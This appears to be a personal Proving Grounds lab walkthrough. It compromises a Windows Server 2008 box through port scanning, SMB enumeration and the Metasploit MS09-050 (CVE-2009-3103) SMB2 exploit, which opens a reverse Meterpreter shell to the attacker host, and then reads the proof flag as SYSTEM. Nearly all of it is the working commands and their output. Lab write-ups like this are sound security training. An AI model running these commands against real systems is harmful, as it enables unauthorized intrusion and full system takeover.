// notes/ Practice Boxes
🟦
Internal — Proving Grounds (192.168.112.40)
sudo rustscan -a $target -- -A -sC
#proving grounds#pg#walkthrough#boxes#os:windows#os:linux#tech:cve
Internal — Proving Grounds (192.168.112.40)
Information Gathering
🐺 howlsec@kalishell
$sudo rustscan -a $target -- -A -sC$ $53/tcp open domain Microsoft DNS 6.0.6001 (Windows Server 2008 SP1)$135/tcp open msrpc Microsoft Windows RPC$139/tcp open netbios-ssn Microsoft Windows netbios-ssn$445/tcp open microsoft-ds Windows Server (R) 2008 Standard 6001 SP1 (workgroup: WORKGROUP)$3389/tcp open ms-wbt-server Microsoft Terminal Service (Target_Name INTERNAL, DNS_Computer_Name internal)$5357/tcp open http Microsoft HTTPAPI httpd 2.0$49152-49158/tcp open msrpc Microsoft Windows RPCSMB (445) enumeration {toggle="true"}
🐺 howlsec@kalicode
01```shellsmbmap -H 192.168.112.40 smbclient -L //192.168.112.40 smbclient -L //192.168.112.40 -U "anonymous"
Nmap SMB vuln scan flagged CVE-2009-3103 (SMBv2 Negotiation Vulnerability, MS09-050)
nmap --script=smb-vuln* $target -p 445 | smb-vuln-cve2009-3103: VULNERABLE (CVE-2009-3103) | smb-os-discovery: Windows Server (R) 2008 Standard 6001 SP1 ```
Foothold: MS09-050 via Metasploit
🐺 howlsec@kalishell
$sudo msfconsole$msf > search ms09-050$msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index$msf > set LHOST 192.168.45.198$msf > set RHOSTS 192.168.112.40$msf > run$[*] Meterpreter session 1 opened$meterpreter > shell$C:\Windows\system32>whoami$nt authority\system$ $C:\Users\Administrator\Desktop>type proof.txt$ef8b042d0288441f3301d494b857857b